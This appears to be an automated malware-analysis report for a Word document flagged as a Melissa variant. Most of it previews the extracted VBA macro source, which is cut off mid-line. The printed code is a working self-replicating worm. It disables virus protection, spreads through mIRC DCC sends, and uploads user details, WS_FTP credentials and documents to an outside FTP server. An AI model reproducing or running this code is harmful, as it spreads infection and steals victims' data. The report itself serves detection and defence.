MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This macro attempts to create a script.ini file in various locations, including 'C:\MIRC\Script.ini', suggesting an attempt to download and execute a secondary payload. The presence of the 'Doc.Trojan.Melissa-17' ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Melissa-17 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Melissa-17
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18426 bytes |
SHA-256: f6b0c3b018ecb03520d263d982e13ed115e874d9932be3420e45eb47104c1257 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = wdDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Randomize Timer
LordArz = "Technological Illusions"
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True
If NormInstalled = False Then
Set Infection = NormCarrier
Set Carrier = ActCarrier
Else
Set Infection = ActCarrier
Set Carrier = NormCarrier
End If
DoEvents
Rem -------------------BEGIN WORM------------------------------------->
Close
Tr1 = Dir(CurDir & "\script.ini", vbNormal)
Tr2 = UCase(Right(CurDir, 8))
Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)
If Tr1 <> "" Then SDir = CurDir & "\script.ini"
If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"
If SDir <> "" Then
Open SDir For Output As #1
Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
Close #1
End If
Rem ----------------------------END WORM------------------------------>
DoEvents
Rem ----------------------------BEGIN PAYLOAD------------------------->
WinPath = Environ("WINDIR")
If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Or System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date) Then
With Application.FileSearch
.FileName = "WS_FTP.ini"
.LookIn = "C" & Chr(58) & "\"
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
WsPath = .FoundFiles(1)
End With
DoEvents
If ActiveDocument.HasPassword = True Then BCK = True
DoEvents
Open WinPath & "\" & Application.UserInitials & ".dat" For Output As #10
Print #10, Application.UserName
Print #10, Application.UserAddress
If BCK = True Then Print #10, ActiveDocument.FullName
If WsPath <> "" Then Print #10, "WS_FTP"
Close #10
Open WinPath & "\Command.$$$" For Output As #8
Print #8, "o ftp.xoom.com"
Print #8, "User SingOfScream"
Print #8, "DIG001"
Print #8, "binary"
Print #8, "put " & WinPath & "\" & Application.UserInitials & ".dat"
If WsPath <> "" Then Print #8, "put " & WsPath
If BCK = True Then Print #8, "put " & ActiveDocument.FullName
Print #8, "quit"
Close
Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date)
End If
Rem ------------------------------END OF PAYLOAD---------------------->
For x = 1 To ThisDocument.Variables.Count
ThisDocument.Variables(x).Delete
Next x
For x = 1 To Normal.ThisDocument.Variables.Count
Normal.ThisDocument.Variables(x).Delete
Next x
With Carrier
UECode = .Lines(1, 2) & Chr(13)
For x = 5 To .CountOfLines - 1
VCCode = .Lines(x, 1)
If VCCode = "End Sub" Then Exit For
For i = 1 To 20
If Mid(VCCode, i, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - i)
Next i
factor = ""
For Y = 1 To Int(Rnd * 6) + 6
factor = factor & Chr(Int(Rnd * 25) + 65)
Next Y
make_morph =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.